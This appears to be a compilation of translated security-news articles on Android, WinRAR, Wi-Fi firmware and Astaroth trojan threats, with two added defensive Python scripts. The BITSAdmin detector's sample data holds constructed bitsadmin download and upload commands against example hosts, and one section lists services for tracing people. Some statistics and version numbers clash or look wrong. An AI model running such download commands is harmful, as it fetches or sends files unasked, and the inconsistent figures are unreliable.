US researchers have discovered a vulnerability of Android smartphones that can steal users' personal data

Bluetooth devices endanger smartphones: the list


A new vulnerability affects Android smartphones and endangers hundreds of thousands of devices. The alarm was raised by researchers from Purdue University and Iowa University, who published a research paper showing that some Bluetooth devices or USB accessories are able to steal relevant smartphone information such as the IMEI number, the code used to identify a mobile phone.

The technique discovered by the researchers gives a potential attacker a long series of possible actions, all of them dangerous to users’ personal data. And not only that: the devices can in turn be used to launch DDoS (Distributed Denial of Service) attacks able to knock out a website or a company network. The research was carried out on a dozen Android smartphones with different processors, Qualcomm, HiSilicon (Kirin) and Samsung (Exynos), and all were vulnerable to attack, although in different ways.

The researchers immediately alerted the manufacturers and waited ninety days before publishing the report, to allow time to develop a patch. The only company that gave the researchers an answer was Samsung, which started developing a fix that will be published with the next updates.

How the vulnerability that affects Android smartphones works

Let’s start with the conclusion: the vulnerability discovered by the researchers is rather complicated to exploit and requires a large investment of time by the attackers. But some attackers could still exploit it to steal your personal information.

As explained in the research paper, the attack affects several Android smartphones and exploits an operating system flaw to “enter” the device. To do this it is necessary to use Bluetooth devices or USB accessories designed specifically for this type of operation. The researchers have shown that with these devices it is possible to execute AT commands. These are commands that set features such as connection type, waiting times and busy signal detection. With them it is also possible to get the IMEI number of the smartphone, take control of the mobile phone to perform DDoS attacks, or remotely cut off the smartphone’s connectivity. All of these are functions that matter in a person’s everyday life.

The list of Android smartphones affected by the vulnerability

The researchers tested ten devices from six different manufacturers. Here is the complete list:

Galaxy S8+
Google Pixel 2
Huawei Nexus 6P
Motorola Nexus 6
Galaxy Note 2
Galaxy S3
LG G3
LG Nexus 5
HTC Desire 10 Lifestyle
Huawei P8 Lite

These are fairly dated smartphones, but this does not mean that newer devices are not equally vulnerable to attack. As mentioned above, the researchers have warned the manufacturers, who are working to release a security patch as soon as possible. Samsung was the first to get to work on a solution to the problem.

Ransomware

Ransomware: what it is and how to protect yourself

Ransomware is not a new kind of attack. In fact, this type of computer attack was first recognized around 1989, when it spread from one computer to another on diskettes. Today all information and devices are connected through the network.
Thanks to the existence of various open-source ransomware programs and the possibility of large financial gains, this type of attack has become more frequent over time. The attacker’s aim is always economic. Ransomware is not intended to damage the victim’s files but to steal them and then ask for a ransom for them.

But how can we prevent a ransomware attack from occurring?

Here are some tips:

Update the operating system and applications regularly: Most updates include security patches that are essential to the security of any device. Updating web browsers is especially important.

Backup copies: Regularly backing up your operating system to external devices is highly recommended. If there is any loss of information or any type of attack, we can be sure that we have a copy to fall back on. There are many free cloud storage systems.

Use antivirus and update it: Avast is a very practical option because it offers different degrees of protection, including protection against ransomware.

Take preventive measures: For example, you should avoid opening files and links that come from unknown sources. All emails that come from an unreliable contact should be deleted without even opening them. In addition, when you are going to enter your personal data in any form, make sure that the website has HTTPS enabled.
Only by following these simple measures will you be able to protect yourself against ransomware attacks.

Confirmed: installing an antivirus on Android is exactly the same as not doing it

Installing an antivirus on Android is exactly the same as not installing it


Every year there are 1 or 2 significant ‘viruses’ for mobile phones, and it is even said that 2019 will be the year of malware thanks to the increase and proliferation of fake apps with malicious code, backdoors, banking Trojans and the boom in cryptomining malware. There are currently several free antivirus apps for Android phones, but it has been confirmed that installing them is exactly the same as not doing so.

A report from AV-Comparatives shows that the company tested 250 antivirus applications for Android, Google’s platform, and found that only 80% of them met the site’s basic standards. That is, they detected more than 30% of the malicious apps of 2018 and had zero false alarms, although some applications fell short.

For the study, the tests were conducted in January 2019 and the researchers used a Samsung Galaxy S9 with Android 8.9 Oreo and a Nexus 5 with Android 6.01. The method was to check the effectiveness of the 250 applications against the 2,000 most common malware threats for Android during 2018.

Only 23 apps detected 100% of the threats

2019 will be the year of the malware according to the latest report of the well-known McAfee antivirus

The study also reflects that the applications overlooked antivirus products known as AVG, Kaspersky, McAfee and Symantec, which usually catch everything. In addition, it notes that antimalware apps from 32 suppliers have been removed from the Play Store in the two months since the test was conducted.

Of all the antivirus apps, only 80 detected more than 30% of the malware, and of those, 23 detected 100% of the threats. The researchers advise users not to be swayed by user ratings, since most users rate an app based on their experience, without knowing whether it offers effective protection.

The study also recommends that users choose antivirus from well-known, verified and reputable suppliers. The investigation illustrates the challenge faced by Google and other store operators when it comes to vetting applications.

WinRAR has a bug

WinRAR has a bug: 500 million users at risk

Check Point researchers discovered a vulnerability in WinRAR that endangered the PCs of 500 million users. Here’s what to do to defend yourself

A bug in WinRAR has endangered the personal data of over 500 million users. Researchers at Check Point, a company specializing in cybersecurity, discovered the flaw and immediately warned the developers of WinRAR. A patch to solve the problem has already been released. The bug made any PC vulnerable to any type of cyber attack and gave hackers the ability to take control of the computer and the entire corporate network.

The vulnerability had been present in WinRAR since the release of the first version and affected all the versions developed in the last 19 years. The problem lay in the UNACEV2.DLL library used to decompress files in ACE format. By exploiting the vulnerability, hackers could hide viruses in ACE files that infect the computer without the user being aware of it. The library had no countermeasure against this type of attack and made the PC vulnerable. WinRAR has released a patch that disables the offending library.

What you risk by using an old version of WinRAR

If you are still using an outdated version of WinRAR, you are endangering the security of your data and your PC. The vulnerability discovered by Check Point researchers allows hackers to take control of the PC and the corporate network. The developers of WinRAR have released a new version (WinRAR 5.70 Beta 1) that solves the problem by disabling the use of the UNACEV2.DLL library. The only drawback is the end of support for the ACE format, which can no longer be decompressed using WinRAR.

To update WinRAR just access the program website and download the latest version of the software.
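
Alongside updating, a machine can be checked for leftover copies of the library and for ACE-format files. The following is an added example, not code from Check Point or WinRAR: it identifies ACE content by the `**ACE**` signature that the ACE format places 7 bytes into the header (a property of the format, not stated in the article), and the sample tree it builds is constructed for the demonstration.

```python
import os
import tempfile

ACE_MAGIC = b"**ACE**"        # signature found 7 bytes into an ACE archive header
ACE_MAGIC_OFFSET = 7
ACE_LIBRARY = "unacev2.dll"   # the library named in the article

def is_ace_archive(path):
    """True when the file carries the ACE signature, whatever its name."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(ACE_MAGIC_OFFSET + len(ACE_MAGIC))
    except OSError:
        return False
    return head[ACE_MAGIC_OFFSET:] == ACE_MAGIC

def audit_tree(root):
    """Walk root; return (ace_files, library_copies) as sorted lists of paths."""
    ace_files, library_copies = [], []
    for folder, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(folder, name)
            if name.lower() == ACE_LIBRARY:
                library_copies.append(path)
            elif is_ace_archive(path):
                ace_files.append(path)
    return sorted(ace_files), sorted(library_copies)

def build_sample_tree(root):
    """Constructed sample files: only the first 14 bytes matter to the check."""
    ace_header = b"\x00" * ACE_MAGIC_OFFSET + ACE_MAGIC + b"\x00" * 16
    samples = {
        "docs/report.ace": ace_header,
        "docs/backup.dat": ace_header,   # ACE content without the .ace extension
        "docs/real.rar": b"Rar!\x1a\x07\x00" + b"\x00" * 16,
        "apps/WinRAR/UNACEV2.DLL": b"MZ" + b"\x00" * 16,
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        ace, libs = audit_tree(tmp)
        print("ACE-format files:", [os.path.relpath(p, tmp) for p in ace])
        print("UNACEV2.DLL copies:", [os.path.relpath(p, tmp) for p in libs])
```

Self-extracting archives, where the signature sits later in the file, are outside what this check covers.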

The vast majority of targeted attacks start from a phishing mail

How do hackers spy on us: How To avoid the risk of hackers stealing data

A photo or a phone number is enough to discover your identity on the Internet. Don’t believe it? Then you don’t know about the experiments conducted by Kaspersky.

In recent years hacker attacks have increased exponentially. Some of these episodes have resulted in the theft of personal data of millions of users of social networks and other sites that require registration. In other cases, however, they were targeted attacks, meant to obtain the personal data of specific people or to get into their computers and mobile devices.

According to the well-known computer security company Kaspersky, the vast majority of targeted attacks start from a phishing mail. This means that hackers have managed to get hold of some user data and used it for a more complex and profitable attack on that user. But how do hackers steal the data? Kaspersky itself ran an experiment: it tried to replicate all the possible ways in which a hacker can obtain information about us starting from an anonymous photo, a name and surname, or an email address and telephone number.

How to find out a person’s name from a photo

When a hacker has only one photo available, the search starts uphill. There are sites like FindFace that can recover a person’s social identity if given several shots to process. It was once a free tool open to the public; now the company prefers to sell its technology only to governments and large companies. A hacker could also use Google, but with very few results, because image search does not shine for accuracy and can only find photos posted on websites, not those posted on social networks.

How to find a person with name and surname

With the name and surname available, however, the hacker’s mission becomes simpler, unless the user has a very common name and surname, like Mario Rossi. With these two pieces of data it is often possible to find at least one more or less public social profile of the user, from which to extract other useful information to continue the attack.

How to find a person with email

With an email address and phone number an attacker can use services like Pipl, which collects information from different social networks and creates almost complete profiles with everything on the web about that person. If the username of the personal mailbox is the same as that of the company one, an attacker could use programs like Namechk or Knowem, which automatically track an account created with hundreds of different services including Facebook, Blogger, eBay, WordPress, Pinterest and many others. Therefore, starting from a company email address, it is easy to reach a personal profile.

What to do to avoid identity theft

To avoid the risk of hackers stealing data, Kaspersky reiterates some basic advice:

Do not register on social networks with e-mail addresses or phone numbers that are then made public
Do not use the same photo on personal and work profiles
Use different names to prevent one profile from leading to another and so on
Do not make life easier for cybercriminals by posting unnecessary information about you on social networks

A computer scientist has discovered four vulnerabilities in Wi-Fi that would endanger millions of devices including PS4 and Xbox

PS4 and Xbox at risk of hackers due to Wi-Fi

We use Wi-Fi technology every day to connect our devices to the Internet. It has become normal to tap the Wi-Fi icon and wait the few seconds that separate us from the Net. Unfortunately, Wi-Fi hides a problem that could put millions of devices at risk. The researcher Denis Selianin has discovered four vulnerabilities that endanger certain devices that use Wi-Fi technology.

There are 6.2 billion electronic devices potentially exposed to attack by hackers due to a series of Wi-Fi vulnerabilities discovered by the researcher from the company Embedi, and among them are millions of PlayStation 4, Xbox One, Windows Surface laptops, Chromebooks and smartphones of many brands. It all depends, Selianin explains, on a trivial security problem in the ThreadX operating system, used as firmware to run most Wi-Fi chips.

What are the vulnerabilities affecting Wi-Fi

For example, the researcher was able to easily compromise a Marvell Avastar 88W8897 wireless network chip, which is extremely widespread. Selianin discovered four potential vulnerabilities, all very simple for a hacker to exploit and all very dangerous for the damage they could cause. One of the vulnerabilities, for example, can be triggered without any user interaction when scanning for available networks. The tested Marvell chip, in fact, scans for networks on its own every five minutes. Thanks to the bug in the ThreadX operating system, however, with each of these scans portions of malicious code could be sent to the devices to take control of them. And this is possible even if the devices are not connected to any network, but are simply detectable because they are within range of the Wi-Fi chip.

Selianin explained that he had found two methods to exploit this bug: one worked only with the Marvell chipset, the other with any ThreadX-based firmware. The researcher has also shown the code to exploit these vulnerabilities, while withholding the technical details that would allow hackers to use it to infect billions of devices with Wi-Fi chips controlled by ThreadX.

How to protect your devices

The big problem is precisely how widely this operating system has spread across devices of all kinds. Now Express Logic, the company that develops ThreadX, will have to quickly create a patch to “plug the holes” discovered by Selianin and, even more difficult, the operating system update will have to be distributed to all devices with Wi-Fi chips that already use it. Users, meanwhile, do not have many ways to protect themselves because the Wi-Fi chip scans for networks on its own. On PS4 and Xbox One, for example, the only option is to disable Wi-Fi from the console settings. On laptops and smartphones, however, doing without Wi-Fi is almost unthinkable today.

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here's how Astaroth works

Astaroth: A trojan disguised as an image can infect PC and steals your data


A new hacker campaign using the Astaroth trojan, already known to security experts because it infected thousands of computers around the world in the last three months of 2018, is currently underway in Brazil and Europe. The infection starts from a false image, spread by email.

The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin, an official Microsoft Windows utility designed to facilitate download and upload operations, but used by the trojan to download malicious code. This variant of Astaroth is distributed through spam email campaigns, and the infection begins when the user opens an archive in .7zip format attached to the email, reached through a link or, in fact, embedded in a GIF or JPG image. The malicious archive contains a .lnk file that starts the actual infection. Subsequently, the malware connects to a server and begins to steal information from the infected computer. It then uses BITSAdmin to fetch other images and files from another server.
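
Because the chain described above relies on BITSAdmin for its downloads, process-creation logs are a natural place to look for it. The following is an added example, not Cybereason's detection logic: it parses constructed command lines for BITSAdmin download jobs (`/transfer` and `/addfile`) and flags any whose remote host is not on an allowlist. The event field names, hosts and allowlist are assumptions made for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events; the field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "PC-01", "command_line":
        r'bitsadmin.exe /transfer job1 /download /priority foreground '
        r'http://files.example.test/img/a.jpg "C:\Users\Public\a.jpg"'},
    {"host": "PC-01", "command_line": r'C:\Windows\System32\bitsadmin.exe /list /allusers'},
    {"host": "PC-02", "command_line":
        r'"C:\Windows\System32\bitsadmin.exe" /addfile upd '
        r'https://updates.example.internal/agent.msi C:\ProgramData\agent.msi'},
    {"host": "PC-03", "command_line": r'notepad.exe C:\Users\bob\bitsadmin-notes.txt'},
    {"host": "PC-03", "command_line":
        r'bitsadmin /transfer up /upload http://files.example.test/in C:\out.zip'},
]

# Hosts this (hypothetical) environment expects BITS downloads from.
ALLOWED_HOSTS = {"updates.example.internal"}
DOWNLOAD_VERBS = {"/transfer", "/addfile"}
TOKEN = re.compile(r'"[^"]*"|\S+')

def parse_bitsadmin_download(command_line):
    """Return {'verb', 'url', 'local'} for a BITSAdmin download, else None."""
    tokens = [t.strip('"') for t in TOKEN.findall(command_line)]
    exe = re.split(r"[\\/]", tokens[0])[-1].lower() if tokens else ""
    if exe not in ("bitsadmin", "bitsadmin.exe"):
        return None
    args = tokens[1:]
    lowered = [a.lower() for a in args]
    verb = next((a for a in lowered if a in DOWNLOAD_VERBS), None)
    if verb is None or "/upload" in lowered:
        return None
    for i, arg in enumerate(args):
        if re.match(r"https?://", arg, re.I):
            local = args[i + 1] if i + 1 < len(args) else None
            return {"verb": verb, "url": arg, "local": local}
    return None

def find_bits_downloads(events, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per BITSAdmin download; 'alert' marks unlisted hosts."""
    findings = []
    for event in events:
        hit = parse_bitsadmin_download(event["command_line"])
        if hit:
            remote = (urlparse(hit["url"]).hostname or "").lower()
            findings.append({**hit, "host": event["host"], "remote": remote,
                             "alert": remote not in allowed_hosts})
    return findings

if __name__ == "__main__":
    for f in find_bits_downloads(SAMPLE_EVENTS):
        print("ALERT" if f["alert"] else "ok   ", f["host"], f["verb"], f["url"], "->", f["local"])
```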

Immune to antiviruses

The most dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to modify a .dll file used by the Avast antivirus by injecting malicious code into it. Through this file, once infected, the trojan manages to steal other information about the machine it is running on and to download other code. Moreover, it also manages to hide itself during an antivirus scan carried out with Avast.

What Astaroth does

The Cybereason research team has discovered that once the trojan has successfully infiltrated, it records user keystrokes, intercepts calls to the operating system and continually gathers all the information saved to the clipboard. With these methods, it collects significant amounts of personal information, including details of the user’s bank accounts. And if the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers connected to the same LAN, email account passwords, Messenger account data and Internet Explorer passwords.

Astaroth first appeared online in 2017, and then infected thousands of PCs, especially in South America. It went through several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders never made by the user. If the user clicked on the links contained in the email, the infection started.